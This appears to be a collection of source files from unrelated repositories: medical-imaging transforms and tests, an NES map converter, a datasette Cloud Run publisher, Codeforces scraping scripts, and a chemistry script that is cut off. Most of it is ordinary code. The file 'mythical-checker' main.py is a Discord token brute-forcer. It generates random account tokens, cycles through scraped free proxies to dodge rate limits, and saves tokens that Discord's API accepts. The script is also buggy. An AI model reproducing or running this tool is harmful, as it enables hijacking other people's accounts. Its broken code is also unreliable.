np.arange(shape[2]), indexing='ij')
indices = np.reshape(x + dx, (-1, 1)), \
np.reshape(y + dy, (-1, 1)), \
np.reshape(z + dz, (-1, 1))
# Apply deformation
data_out = map_coordinates(sample, indices, order=1, mode='reflect')
# Keep input shape
data_out = data_out.reshape(shape)
# Keep data type
data_out = data_out.astype(sample.dtype)
return data_out, metadata
else:
return sample, metadata
class AdditiveGaussianNoise(ImedTransform):
"""Adds Gaussian Noise to images.
Args:
mean (float): Gaussian noise mean.
std (float): Gaussian noise standard deviation.
"""
def __init__(self, mean=0.0, std=0.01):
self.mean = mean
self.std = std
@multichannel_capable
def __call__(self, sample, metadata=None):
if "gaussian_noise" in metadata:
noise = metadata["gaussian_noise"]
else:
# Get random noise
noise = np.random.normal(self.mean, self.std, sample.shape)
noise = noise.astype(np.float32)
# Apply noise
data_out = sample + noise
return data_out.astype(sample.dtype), metadata
class Clahe(ImedTransform):
""" Applies Contrast Limited Adaptive Histogram Equalization for enhancing the local image contrast.
.. seealso::
<NAME>. "Contrast limited adaptive histogram equalization." Graphics gems (1994): 474-485.
Default values are based on:
.. seealso::
<NAME>, et al. "3-D consistent and robust segmentation of cardiac images by deep learning with spatial
propagation." IEEE transactions on medical imaging 37.9 (2018): 2137-2148.
Args:
clip_limit (float): Clipping limit, normalized between 0 and 1.
kernel_size (tuple of int): Defines the shape of contextual regions used in the algorithm. Length equals image
dimension (ie 2 or 3 for 2D or 3D, respectively).
"""
def __init__(self, clip_limit=3.0, kernel_size=(8, 8)):
self.clip_limit = clip_limit
self.kernel_size = kernel_size
@multichannel_capable
def __call__(self, sample, metadata=None):
assert len(self.kernel_size) == len(sample.shape)
# Run equalization
data_out = equalize_adapthist(sample,
kernel_size=self.kernel_size,
clip_limit=self.clip_limit).astype(sample.dtype)
return data_out, metadata
class HistogramClipping(ImedTransform):
"""Performs intensity clipping based on percentiles.
Args:
min_percentile (float): Between 0 and 100. Lower clipping limit.
max_percentile (float): Between 0 and 100. Higher clipping limit.
"""
def __init__(self, min_percentile=5.0, max_percentile=95.0):
self.min_percentile = min_percentile
self.max_percentile = max_percentile
@multichannel_capable
def __call__(self, sample, metadata=None):
data = np.copy(sample)
# Run clipping
percentile1 = np.percentile(sample, self.min_percentile)
percentile2 = np.percentile(sample, self.max_percentile)
data[sample <= percentile1] = percentile1
data[sample >= percentile2] = percentile2
return data, metadata
def get_subdatasets_transforms(transform_params):
"""Get transformation parameters for each subdataset: training, validation and testing.
Args:
transform_params (dict):
Returns:
dict, dict, dict: Training, Validation and Testing transformations.
"""
transform_params = copy.deepcopy(transform_params)
train, valid, test = {}, {}, {}
subdataset_default = ["training", "validation", "testing"]
# Loop across transformations
for transform_name in transform_params:
subdataset_list = ["training", "validation", "testing"]
# Only consider subdatasets listed in dataset_type
if "dataset_type" in transform_params[transform_name]:
subdataset_list = transform_params[transform_name]["dataset_type"]
# Add current transformation to the relevant subdataset transformation dictionaries
for subds_name, subds_dict in zip(subdataset_default, [train, valid, test]):
if subds_name in subdataset_list:
subds_dict[transform_name] = transform_params[transform_name]
if "dataset_type" in subds_dict[transform_name]:
del subds_dict[transform_name]["dataset_type"]
return train, valid, test
def get_preprocessing_transforms(transforms):
"""Checks the transformations parameters and selects the transformations which are done during preprocessing only.
Args:
transforms (dict): Transformation dictionary.
Returns:
dict: Preprocessing transforms.
"""
original_transforms = copy.deepcopy(transforms)
preprocessing_transforms = copy.deepcopy(transforms)
for idx, tr in enumerate(original_transforms):
if tr == "Resample" or tr == "CenterCrop" or tr == "ROICrop":
del transforms[tr]
else:
del preprocessing_transforms[tr]
return preprocessing_transforms
def apply_preprocessing_transforms(transforms, seg_pair, roi_pair=None):
"""
Applies preprocessing transforms to segmentation pair (input, gt and metadata).
Args:
transforms (Compose): Preprocessing transforms.
seg_pair (dict): Segmentation pair containing input and gt.
roi_pair (dict): Segementation pair containing input and roi.
Returns:
tuple: Segmentation pair and roi pair.
"""
if transforms is None:
return (seg_pair, roi_pair)
metadata_input = seg_pair['input_metadata']
if roi_pair is not None:
stack_roi, metadata_roi = transforms(sample=roi_pair["gt"],
metadata=roi_pair['gt_metadata'],
data_type="roi")
metadata_input = imed_loader_utils.update_metadata(metadata_roi, metadata_input)
# Run transforms on images
stack_input, metadata_input = transforms(sample=seg_pair["input"],
metadata=metadata_input,
data_type="im")
# Run transforms on images
metadata_gt = imed_loader_utils.update_metadata(metadata_input, seg_pair['gt_metadata'])
stack_gt, metadata_gt = transforms(sample=seg_pair["gt"],
metadata=metadata_gt,
data_type="gt")
seg_pair = {
'input': stack_input,
'gt': stack_gt,
'input_metadata': metadata_input,
'gt_metadata': metadata_gt
}
if roi_pair is not None and len(roi_pair['gt']):
roi_pair = {
'input': stack_input,
'gt': stack_roi,
'input_metadata': metadata_input,
'gt_metadata': metadata_roi
}
return (seg_pair, roi_pair)
def prepare_transforms(transform_dict, requires_undo=True):
"""
This function separates the preprocessing transforms from the others and generates the undo transforms related.
Args:
transform_dict (dict): Dictionary containing the transforms and there parameters.
requires_undo (bool): Boolean indicating if transforms can be undone.
Returns:
list, UndoCompose: transform lst containing the preprocessing transforms and regular transforms, UndoCompose
object containing the transform to undo.
"""
training_undo_transform = None
if requires_undo:
training_undo_transform = UndoCompose(Compose(transform_dict.copy()))
preprocessing_transforms = get_preprocessing_transforms(transform_dict)
prepro_transforms = Compose(preprocessing_transforms, requires_undo=requires_undo)
transforms = Compose(transform_dict, requires_undo=requires_undo)
tranform_lst = [prepro_transforms if len(preprocessing_transforms) else None, transforms]
return tranform_lst, training_undo_transform
|
nekohayo/ivadomed | testing/unit_tests/test_loader.py | import os
import pytest
import pandas as pd
import csv_diff
from ivadomed.loader import utils as imed_loader_utils
@pytest.mark.parametrize('loader_parameters', [{
"bids_path": "testing_data/microscopy_png",
"bids_config": "ivadomed/config/config_bids.json",
"target_suffix": [["_seg-myelin-manual", "_seg-axon-manual"]],
"extensions": [".png"],
"contrast_params": {
"training_validation": [],
"testing": [],
"balance": {}
}}])
def test_bids_df_microscopy_png(loader_parameters):
# Test for microscopy png file format
# Test for _sessions.tsv and _scans.tsv files
# Test for target_suffix as a nested list
# Test for when no contrast_params are provided
loader_params = loader_parameters
loader_params["contrast_params"]["contrast_lst"] = loader_params["contrast_params"]["training_validation"]
bids_path = loader_params["bids_path"]
derivatives = True
df_test = imed_loader_utils.create_bids_dataframe(loader_params, derivatives)
df_test = df_test.drop(columns=['path', 'parent_path'])
df_test = df_test.sort_values(by=['filename']).reset_index(drop=True)
csv_ref = os.path.join(bids_path, "df_ref.csv")
csv_test = os.path.join(bids_path, "df_test.csv")
df_test.to_csv(csv_test, index=False)
diff = csv_diff.compare(csv_diff.load_csv(open(csv_ref)), csv_diff.load_csv(open(csv_test)))
assert diff == {'added': [], 'removed': [], 'changed': [], 'columns_added': [], 'columns_removed': []}
@pytest.mark.parametrize('loader_parameters', [{
"bids_path": "testing_data",
"target_suffix": ["_seg-manual"],
"extensions": [],
"contrast_params": {
"training_validation": ["T1w", "T2w"],
"testing": [],
"balance": {}
}}])
def test_bids_df_anat(loader_parameters):
# Test for MRI anat nii.gz file format
# Test for when no file extensions are provided
# Test for multiple target_suffix
loader_params = loader_parameters
loader_params["contrast_params"]["contrast_lst"] = loader_params["contrast_params"]["training_validation"]
bids_path = loader_params["bids_path"]
derivatives = True
df_test = imed_loader_utils.create_bids_dataframe(loader_params, derivatives)
df_test = df_test.drop(columns=['path', 'parent_path'])
df_test = df_test.sort_values(by=['filename']).reset_index(drop=True)
csv_ref = os.path.join(bids_path, "df_ref.csv")
csv_test = os.path.join(bids_path, "df_test.csv")
df_test.to_csv(csv_test, index=False)
diff = csv_diff.compare(csv_diff.load_csv(open(csv_ref)), csv_diff.load_csv(open(csv_test)))
assert diff == {'added': [], 'removed': [], 'changed': [], 'columns_added': [], 'columns_removed': []}
|
nekohayo/ivadomed | testing/unit_tests/test_HeMIS.py | <filename>testing/unit_tests/test_HeMIS.py
import os
import time
import pytest
import numpy as np
import torch
import torch.backends.cudnn as cudnn
from torch import optim
from torch.utils.data import DataLoader
from tqdm import tqdm
import ivadomed.transforms as imed_transforms
from ivadomed import losses
from ivadomed import models
from ivadomed import utils as imed_utils
from ivadomed.loader import utils as imed_loader_utils, adaptative as imed_adaptative
from ivadomed import training as imed_training
cudnn.benchmark = True
GPU_NUMBER = 0
BATCH_SIZE = 4
DROPOUT = 0.4
BN = 0.1
N_EPOCHS = 10
INIT_LR = 0.01
PATH_BIDS = 'testing_data'
p = 0.0001
@pytest.mark.run(order=1)
def test_HeMIS(p=0.0001):
print('[INFO]: Starting test ... \n')
training_transform_dict = {
"Resample":
{
"wspace": 0.75,
"hspace": 0.75
},
"CenterCrop":
{
"size": [48, 48]
},
"NumpyToTensor": {}
}
transform_lst, _ = imed_transforms.prepare_transforms(training_transform_dict)
roi_params = {"suffix": "_seg-manual", "slice_filter_roi": None}
train_lst = ['sub-unf01']
contrasts = ['T1w', 'T2w', 'T2star']
print('[INFO]: Creating dataset ...\n')
model_params = {
"name": "HeMISUnet",
"dropout_rate": 0.3,
"bn_momentum": 0.9,
"depth": 2,
"in_channel": 1,
"out_channel": 1,
"missing_probability": 0.00001,
"missing_probability_growth": 0.9,
"contrasts": ["T1w", "T2w"],
"ram": False,
"path_hdf5": 'testing_data/mytestfile.hdf5',
"csv_path": 'testing_data/hdf5.csv',
"target_lst": ["T2w"],
"roi_lst": ["T2w"]
}
contrast_params = {
"contrast_lst": ['T1w', 'T2w', 'T2star'],
"balance": {}
}
dataset = imed_adaptative.HDF5Dataset(root_dir=PATH_BIDS,
subject_lst=train_lst,
model_params=model_params,
contrast_params=contrast_params,
target_suffix=["_lesion-manual"],
slice_axis=2,
transform=transform_lst,
metadata_choice=False,
dim=2,
slice_filter_fn=imed_loader_utils.SliceFilter(filter_empty_input=True,
filter_empty_mask=True),
roi_params=roi_params)
dataset.load_into_ram(['T1w', 'T2w', 'T2star'])
print("[INFO]: Dataset RAM status:")
print(dataset.status)
print("[INFO]: In memory Dataframe:")
print(dataset.dataframe)
# TODO
# ds_train.filter_roi(nb_nonzero_thr=10)
train_loader = DataLoader(dataset, batch_size=BATCH_SIZE,
shuffle=True, pin_memory=True,
collate_fn=imed_loader_utils.imed_collate,
num_workers=1)
model = models.HeMISUnet(contrasts=contrasts,
depth=3,
drop_rate=DROPOUT,
bn_momentum=BN)
print(model)
cuda_available = torch.cuda.is_available()
if cuda_available:
torch.cuda.set_device(GPU_NUMBER)
print("Using GPU number {}".format(GPU_NUMBER))
model.cuda()
# Initialing Optimizer and scheduler
step_scheduler_batch = False
optimizer = optim.Adam(model.parameters(), lr=INIT_LR)
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, N_EPOCHS)
load_lst, reload_lst, pred_lst, opt_lst, schedul_lst, init_lst, gen_lst = [], [], [], [], [], [], []
for epoch in tqdm(range(1, N_EPOCHS + 1), desc="Training"):
start_time = time.time()
start_init = time.time()
lr = scheduler.get_last_lr()[0]
model.train()
tot_init = time.time() - start_init
init_lst.append(tot_init)
num_steps = 0
start_gen = 0
for i, batch in enumerate(train_loader):
if i > 0:
tot_gen = time.time() - start_gen
gen_lst.append(tot_gen)
start_load = time.time()
input_samples, gt_samples = imed_utils.unstack_tensors(batch["input"]), batch["gt"]
print(batch["input_metadata"][0][0]["missing_mod"])
missing_mod = imed_training.get_metadata(batch["input_metadata"], model_params)
print("Number of missing contrasts = {}."
.format(len(input_samples) * len(input_samples[0]) - missing_mod.sum()))
print("len input = {}".format(len(input_samples)))
print("Batch = {}, {}".format(input_samples[0].shape, gt_samples[0].shape))
if cuda_available:
var_input = imed_utils.cuda(input_samples)
var_gt = imed_utils.cuda(gt_samples, non_blocking=True)
else:
var_input = input_samples
var_gt = gt_samples
tot_load = time.time() - start_load
load_lst.append(tot_load)
start_pred = time.time()
preds = model(var_input, missing_mod)
tot_pred = time.time() - start_pred
pred_lst.append(tot_pred)
start_opt = time.time()
loss = - losses.DiceLoss()(preds, var_gt)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if step_scheduler_batch:
scheduler.step()
num_steps += 1
tot_opt = time.time() - start_opt
opt_lst.append(tot_opt)
start_gen = time.time()
start_schedul = time.time()
if not step_scheduler_batch:
scheduler.step()
tot_schedul = time.time() - start_schedul
schedul_lst.append(tot_schedul)
start_reload = time.time()
print("[INFO]: Updating Dataset")
p = p ** (2 / 3)
dataset.update(p=p)
print("[INFO]: Reloading dataset")
train_loader = DataLoader(dataset, batch_size=BATCH_SIZE,
shuffle=True, pin_memory=True,
collate_fn=imed_loader_utils.imed_collate,
num_workers=1)
tot_reload = time.time() - start_reload
reload_lst.append(tot_reload)
end_time = time.time()
total_time = end_time - start_time
tqdm.write("Epoch {} took {:.2f} seconds.".format(epoch, total_time))
print('Mean SD init {} -- {}'.format(np.mean(init_lst), np.std(init_lst)))
print('Mean SD load {} -- {}'.format(np.mean(load_lst), np.std(load_lst)))
print('Mean SD reload {} -- {}'.format(np.mean(reload_lst), np.std(reload_lst)))
print('Mean SD pred {} -- {}'.format(np.mean(pred_lst), np.std(pred_lst)))
print('Mean SD opt {} -- {}'.format(np.mean(opt_lst), np.std(opt_lst)))
print('Mean SD gen {} -- {}'.format(np.mean(gen_lst), np.std(gen_lst)))
print('Mean SD scheduler {} -- {}'.format(np.mean(schedul_lst), np.std(schedul_lst)))
@pytest.mark.run(order=2)
def test_hdf5_bids():
os.makedirs("test_adap_bids")
imed_adaptative.HDF5ToBIDS('testing_data/mytestfile.hdf5', ['sub-unf01'], "test_adap_bids")
assert os.path.isdir("test_adap_bids/sub-unf01/anat")
assert os.path.isdir("test_adap_bids/derivatives/labels/sub-unf01/anat")
# once done we can delete the file
print("[INFO]: Deleting HDF5 file.")
os.remove('testing_data/mytestfile.hdf5')
print('\n [INFO]: Test of HeMIS passed successfully.')
|
nekohayo/ivadomed | testing/unit_tests/test_model.py | <reponame>nekohayo/ivadomed
import ivadomed.models as imed_model
import torch
import torchvision
# testing countception model
def test_countception():
a = [[[[0 for i in range(10)] for i in range(10)]]]
inp = torch.tensor(a).float()
model = imed_model.Countception(in_channel=1, out_channel=1)
inf = model(inp)
assert (type(inf) == torch.Tensor)
def test_model_3d_att():
# verifying if 3d attention model can be created
a = [[[[[0 for i in range(48)] for j in range(48)] for k in range(16)]]]
inp = torch.tensor(a).float()
model = imed_model.Modified3DUNet(in_channel=1, out_channel=1, attention=True)
inf = model(inp)
assert(type(inf) == torch.Tensor)
def test_resnet():
a = [[[[0 for i in range(100)] for i in range(100)]]]
inp = torch.tensor(a).float()
model = imed_model.ResNet(torchvision.models.resnet.BasicBlock, [2, 2, 2, 2])
inf = model(inp)
assert (type(inf) == torch.Tensor)
def test_densenet():
a = [[[[0 for i in range(100)] for i in range(100)]]]
inp = torch.tensor(a).float()
model = imed_model.DenseNet(32, (6, 12, 24, 16), 64)
inf = model(inp)
assert (type(inf) == torch.Tensor)
def test_filmed_unet():
a = [[[[0 for i in range(100)] for i in range(100)]]]
inp = torch.tensor(a).float()
model = imed_model.FiLMedUnet()
inf = model(inp)
assert (type(inf) == torch.Tensor)
def test_film_generator():
a = [[[[0 for i in range(64)] for i in range(64)]]]
inp = torch.tensor(a).float()
model = imed_model.FiLMgenerator(64, 1)
inf = model(inp)
assert (type(inf[0]) == torch.Tensor)
assert (type(inf[1]) == torch.nn.parameter.Parameter)
|
atenorio3/TouchOfLight | BG/CSV2C.py | <filename>BG/CSV2C.py
#!/usr/bin/python3
# written by <NAME> 2018
# this program takes csv output from Tiled
# and turns it into a C style array that can be included
# NES programming...cc65
import sys
import csv
import os
filename = sys.argv[1]
newname = filename[0:-4] + ".c"
newname2 = os.path.basename(filename)
newname2 = newname2[0:-4]
with open(filename, 'r') as oldfile:
reader = csv.reader(oldfile)
your_list = list(reader)
newfile = open(newname, 'w') # warning, this may overwrite old file !!!!!!!!!!!!!!!!!!!!!
newfile.write("const unsigned char " + newname2 + "[]={\n")
rows = len(your_list)
columns = len(your_list[0])
for i in range (0, rows):
for j in range (0, columns):
newfile.write(your_list[i][j] + ",")
newfile.write("\n")
# delete that last comma, back it up
z = newfile.tell()
z = z - 3
newfile.seek(z)
newfile.write("\n};\n\n")
print("Done.")
oldfile.close
newfile.close
|
chris48s/datasette | datasette/publish/cloudrun.py | <reponame>chris48s/datasette
from datasette import hookimpl
import click
import json
import os
from subprocess import check_call, check_output
from .common import (
add_common_publish_arguments_and_options,
fail_if_publish_binary_not_installed,
)
from ..utils import temporary_docker_directory
@hookimpl
def publish_subcommand(publish):
@publish.command()
@add_common_publish_arguments_and_options
@click.option(
"-n",
"--name",
default="datasette",
help="Application name to use when building",
)
@click.option(
"--service", default="", help="Cloud Run service to deploy (or over-write)"
)
@click.option("--spatialite", is_flag=True, help="Enable SpatialLite extension")
@click.option(
"--show-files",
is_flag=True,
help="Output the generated Dockerfile and metadata.json",
)
def cloudrun(
files,
metadata,
extra_options,
branch,
template_dir,
plugins_dir,
static,
install,
plugin_secret,
version_note,
title,
license,
license_url,
source,
source_url,
about,
about_url,
name,
service,
spatialite,
show_files,
):
fail_if_publish_binary_not_installed(
"gcloud", "Google Cloud", "https://cloud.google.com/sdk/"
)
project = check_output(
"gcloud config get-value project", shell=True, universal_newlines=True
).strip()
extra_metadata = {
"title": title,
"license": license,
"license_url": license_url,
"source": source,
"source_url": source_url,
"about": about,
"about_url": about_url,
}
environment_variables = {}
if plugin_secret:
extra_metadata["plugins"] = {}
for plugin_name, plugin_setting, setting_value in plugin_secret:
environment_variable = (
"{}_{}".format(plugin_name, plugin_setting)
.upper()
.replace("-", "_")
)
environment_variables[environment_variable] = setting_value
extra_metadata["plugins"].setdefault(plugin_name, {})[
plugin_setting
] = {"$env": environment_variable}
with temporary_docker_directory(
files,
name,
metadata,
extra_options,
branch,
template_dir,
plugins_dir,
static,
install,
spatialite,
version_note,
extra_metadata,
environment_variables,
):
if show_files:
if os.path.exists("metadata.json"):
print("=== metadata.json ===\n")
print(open("metadata.json").read())
print("\n==== Dockerfile ====\n")
print(open("Dockerfile").read())
print("\n====================\n")
image_id = "gcr.io/{project}/{name}".format(project=project, name=name)
check_call("gcloud builds submit --tag {}".format(image_id), shell=True)
check_call(
"gcloud beta run deploy --allow-unauthenticated --platform=managed --image {}{}".format(
image_id, " {}".format(service) if service else ""
),
shell=True,
)
|
sxvnlol/mythical-checker | main.py | <filename>main.py
import random
import string
import os
import requests
from itertools import cycle
import base64
from random import randint
from lxml.html import fromstring
import requests
import traceback
from colorama import init, Fore as cc
from os import system, name
from time import sleep
init()
dr = DR = r = R = cc.LIGHTRED_EX
g = G = cc.LIGHTGREEN_EX
b = B = cc.LIGHTBLUE_EX
m = M = cc.LIGHTMAGENTA_EX
c = C = cc.LIGHTCYAN_EX
y = Y = cc.LIGHTYELLOW_EX
w = W = cc.RESET
banner = f'''
{w}███{b}╗{w} ███{b}╗{w}██{b}╗{w} ██{b}╗{w}████████{b}╗{w}██{b}╗{w} ██{b}╗{w}██{b}╗{w} ██████{b}╗{w} █████{b}╗{w} ██{b}╗{w}
████{b}╗{w} ████{b}║{w}{b}╚{w}██{b}╗{w} ██{b}╔{w}{b}╝{w}{b}╚{w}{b}═{w}{b}═{w}██{b}╔{w}{b}═{w}{b}═{w}{b}╝{w}██{b}║{w} ██{b}║{w}██{b}║{w}██{b}╔{w}{b}═{w}{b}═{w}{b}═{w}{b}═{w}{b}╝{w}██{b}╔{w}{b}═{w}{b}═{w}██{b}╗{w}██{b}║{w}
██{b}╔{w}████{b}╔{w}██{b}║{w} {b}╚{w}████{b}╔{w}{b}╝{w} ██{b}║{w} ███████{b}║{w}██{b}║{w}██{b}║{w} ███████{b}║{w}██{b}║{w}
██{b}║{w}{b}╚{w}██{b}╔{w}{b}╝{w}██{b}║{w} {b}╚{w}██{b}╔{w}{b}╝{w} ██{b}║{w} ██{b}╔{w}{b}═{w}{b}═{w}██{b}║{w}██{b}║{w}██{b}║{w} ██{b}╔{w}{b}═{w}{b}═{w}██{b}║{w}██{b}║{w}
██{b}║{w} {b}╚{w}{b}═{w}{b}╝{w} ██{b}║{w} ██{b}║{w} ██{b}║{w} ██{b}║{w} ██{b}║{w}██{b}║{w}{b}╚{w}██████{b}╗{w}██{b}║{w} ██{b}║{w}███████{b}╗{w}
{b}╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝{w}
{m}Made by: sxvn#1337 {w} '''
current_path = os.path.dirname(os.path.realpath(__file__))
url = "https://discordapp.com/api/v6/users/@me/library"
count = 0
def clear():
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
clear()
def get_proxies():
url = 'https://sslproxies.org/'
response = requests.get(url)
parser = fromstring(response.text)
proxies = set()
for i in parser.xpath('//tbody/tr')[:10]:
if i.xpath('.//td[7][contains(text(),"yes")]'):
proxy = ":".join([i.xpath('.//td[1]/text()')[0], i.xpath('.//td[2]/text()')[0]])
proxies.add(proxy)
return proxies
print(banner)
while True:
tokens = []
base64_string = "=="
while(base64_string.find("==") != -1):
sample_string = str(randint(000000000000000000, 999999999999999999))
sample_string_bytes = sample_string.encode("ascii")
base64_bytes = base64.b64encode(sample_string_bytes)
base64_string = base64_bytes.decode("ascii")
else:
token = base64_string+"."+random.choice(string.ascii_letters).upper()+''.join(random.choice(string.ascii_letters + string.digits)
for _ in range(5))+"."+''.join(random.choice(string.ascii_letters + string.digits) for _ in range(27))
tokens.append(token)
proxies = get_proxies()
proxy_pool = cycle(proxies)
for token in tokens:
proxy = next(proxy_pool)
header = {
"Content-Type": "application/json",
"authorization": token
}
r = requests.get(url, headers=header, proxies={"http": proxy})
if r.status_code == 200:
lmao = u"\u001b[32;1m[+] Valid Token\u001b[0m"
f = open(current_path+"/"+tokens.txt)
f.write(token+"\n")
elif "rate limited." in r.text:
lmao = "\u001b[-] You are being rate limited\u001b[0m"
else:
status = u"\u001b[31m[-] Invalid:\u001b[0m"
print(status + " " + token)
count = count + 1
if count == 4:
sleep(0.2)
clear()
print(banner)
count = 0
tokens.remove(token)
|
akoprow/codeforces-editorials | scripts/leaderboard.py | <reponame>akoprow/codeforces-editorials<gh_stars>0
#!/usr/bin/python3
import requests
import sys
from collections import defaultdict
from datetime import datetime
from tqdm import tqdm
def main():
url = f'https://codeforces.com/api/user.ratedList?activeOnly=true'
r = requests.get(url)
users = r.json()['result']
print('handle,rating,country,city,solved')
for user in tqdm(users):
handle = user['handle']
rating = user['rating']
country = user['country'] if 'country' in user else ''
city = user['city'] if 'city' in user else ''
url = f'https://codeforces.com/api/user.status?handle={handle}'
r = requests.get(url)
submissions = r.json()['result']
def id(submission):
problem = submission['problem']
problem['name'] + str(problem['contestId']) if 'contestId' in problem else ''
solved = [ id(submission) for submission in submissions if submission['verdict'] == 'OK']
solvedNum = len(set(solved))
print(f"{handle}, {rating}, {country}, {city}, {solvedNum}")
if __name__ == "__main__":
main()
|
akoprow/codeforces-editorials | scripts/stats.py | #!/usr/bin/python3
import requests
import sys
from collections import defaultdict
from datetime import datetime
def generate(label):
url = f'https://codeforces.com/api/contest.list'
r = requests.get(url)
contests = r.json()['result']
contestYear = {}
for contest in contests:
year = datetime.fromtimestamp(contest['startTimeSeconds']).year
contestYear[contest['id']] = year
url = f'https://codeforces.com/api/problemset.problems'
r = requests.get(url)
data = r.json()['result']['problems']
yearAll = defaultdict(int)
yearLabel = defaultdict(int)
ratingAll = defaultdict(int)
ratingLabel = defaultdict(int)
for problem in data:
year = contestYear[problem['contestId']]
yearAll[year] += 1
if label in problem['tags']:
yearLabel[year] += 1
if 'rating' in problem:
rating = problem['rating']
ratingAll[rating] += 1
if label in problem['tags']:
ratingLabel[rating] += 1
print('By rating')
for rating in sorted(ratingAll):
print(f'{rating},{ratingAll[rating]},{ratingLabel[rating]}')
print('By year')
for year in sorted(yearAll):
print(f'{year},{yearAll[year]},{yearLabel[year]}')
def main():
if len(sys.argv) != 2:
print(f'Usage: {sys.argv[0]} <LABEL>')
exit(0)
label = sys.argv[1]
generate(label)
if __name__ == "__main__":
main()
|
akoprow/codeforces-editorials | scripts/gen.py | <filename>scripts/gen.py
#!/usr/bin/python3
import requests
import sys
from datetime import datetime
def generate(contestId, abbrev, shortName):
url = f'https://codeforces.com/api/contest.standings?contestId={contestId}&from=1&count=1&showUnofficial=false'
print(f'Fetching: {url}')
r = requests.get(url)
data = r.json()['result']
title = data['contest']['name']
start = datetime.fromtimestamp(data['contest']['startTimeSeconds'])
print(f'Contest: <{title}>')
with open('scripts/genall.sh', 'a') as f:
print(f'./gen.py {contestId} {abbrev} "{shortName}"', file=f)
with open(f'_posts/{start.strftime("%Y-%m-%d")}-{abbrev}.md', 'a') as f:
print('---', file=f)
print(f'title: {shortName}', file=f)
print('---', file=f)
print('', file=f)
print(f'[{title}](https://codeforces.com/contest/{contestId})', file=f)
print(file=f)
for problem in data['problems']:
index = problem['index']
name = problem['name']
tags = ', '.join(problem['tags'])
rating = problem.get('rating', None)
print(f'{{% include problem.md id="{contestId}{index}" %}}', file=f)
fn = f'p/{contestId[0:3]}/{contestId}{index}.md'
with open(f'_includes/{fn}', 'a') as p:
print(f'```', file=p)
print(f'TODO', file=p)
print(f'```', file=p)
print(file=f)
print('* * *', file=f)
print(file=f)
print(f"<object data='notes/{abbrev}.pdf' width='1000' height='1000' type='application/pdf'/>", file=f)
with open('_data/problems.yaml', 'a') as f:
for problem in data['problems']:
index = problem['index']
name = problem['name']
labels = ', '.join(problem['tags'])
rating = problem.get('rating', None)
print(f'- id: "{contestId}{index}"', file=f)
print(f' title: "{name}"', file=f)
print(f' labels: "{labels}"', file=f)
if rating:
print(f' rating: {rating}', file=f)
print(file=f)
def main():
if len(sys.argv) != 4:
print(f'Usage: {sys.argv[0]} <CONTEST_ID> <ABBREV> <SHORT_NAME>')
exit(0)
contestId = sys.argv[1]
abbrev = sys.argv[2]
shortName = sys.argv[3]
print(f'Loading contest {contestId} (abbrev: {abbrev}, short name: {shortName})')
generate(contestId, abbrev, shortName)
if __name__ == "__main__":
main()
|
akoprow/codeforces-editorials | scripts/index.py | <filename>scripts/index.py
#!/usr/bin/python3
import re
from pathlib import Path
from tqdm import tqdm
def main():
for path in tqdm(sorted(Path('_includes/p').rglob('*.md'))):
with open(path, 'rt') as f:
ex = f.readlines()[0]
id = re.search(r"_includes/p/\d+/(.+)\.md", str(path))
if not id:
raise Exception(f'Unknown id for file: {path}')
name = re.search(r'name="([^"]+)"', ex)
if not name:
raise Exception(f'Unknown name in: {ex}')
rating = re.search(r'rating=(\d+)', ex)
labels = re.search(r'labels="([^"]+)"', ex)
if not labels:
raise Exception(f'Unknown labels in: {ex}')
code = re.search(r'code="([^"]+)"', ex)
print(f'- id: "{id.group(1)}"')
print(f' title: "{name.group(1)}"')
print(f' labels: "{labels.group(1)}"')
if rating:
print(f' rating: {rating.group(1)}')
if code:
print(f' code: "{code.group(1)}"')
print()
if __name__ == "__main__":
main()
|
akoprow/codeforces-editorials | scripts/addRatings.py | #!/usr/bin/python3
import requests
import sys
def generate(contestId):
url = f'https://codeforces.com/api/contest.standings?contestId={contestId}&from=1&count=1&showUnofficial=false'
print(f'Fetching: {url}')
r = requests.get(url)
data = r.json()['result']
title = data['contest']['name']
print(f'Contest: <{title}>')
for problem in data['problems']:
index = problem['index']
name = problem['name']
tags = ' '.join(['`' + tag + '`' for tag in problem['tags']])
rating = problem.get('rating', None)
p = open(f'_includes/p/{contestId[0:3]}/{contestId}{index}.md', 'a')
print(f'rating={rating}', file=p)
p.close()
def main():
if len(sys.argv) != 2:
print(f'Usage: {sys.argv[0]} <CONTEST_ID>')
exit(0)
contestId = sys.argv[1]
print(f'Loading contest {contestId}')
generate(contestId)
if __name__ == "__main__":
main()
|
kianpu34593/base4gpaw | BASIC/ads_selector.py | from gpaw import GPAW,Mixer,MixerDif,Davidson
import glob
import BASIC.optimizer as opt
import numpy as np
from ase.parallel import parprint,world,paropen
import os
from ase.db import connect
import sys
from ase.calculators.calculator import kptdensity2monkhorstpack as kdens2mp
from ase.io import read,write
def ads_auto_select(element,
struc,
gpaw_calc,
ads,
ads_pot_e,
solver_fmax=0.01,
solver_maxstep=0.04,
temp_print=True,
size='1x1'):
#convert str ind to tuple
m_ind=tuple(map(int,struc))
#set up the workspace
code_dir=os.getcwd() #get the current working dir
#struc_dir=element+'/'+'ads'+'/'+struc #get the structure dir
#
#create report
rep_location=code_dir+'/'+element+'/'+'ads'+'/'+struc+'_results_report.txt'
if world.rank==0 and os.path.isfile(rep_location):
os.remove(rep_location)
#connect to the surface database to get the parameters for calculation
opt_slab=connect('final_database'+'/'+'surf.db').get_atoms(name=element+'('+struc+')')
calc_dict=gpaw_calc.__dict__['parameters']
if calc_dict['spinpol']:
magmom=opt_slab.get_magnetic_moments()
with paropen(rep_location,'a') as f:
parprint('Initial Parameters:',file=f)
parprint('\t'+'Materials: '+element,file=f)
parprint('\t'+'Miller Index: '+str(m_ind),file=f)
parprint('\t'+'Adsorbate: '+str(ads),file=f)
parprint('\t'+'xc: '+calc_dict['xc'],file=f)
parprint('\t'+'h: '+str(calc_dict['h']),file=f)
parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
parprint('\t'+'sw: '+str(calc_dict['occupations']),file=f)
parprint('\t'+'spin polarized: '+str(calc_dict['spinpol']),file=f)
if calc_dict['spinpol']:
parprint('\t'+'init_magmom: '+str(magmom),file=f)
f.close()
ads_file_loc=code_dir+'/'+element+'/'+'ads'+'/'+struc
fils=glob.glob(ads_file_loc+'/'+'adsorbates/Li/**/**/*.traj',recursive=False)
ads_dict={}
with paropen(rep_location,'a') as f:
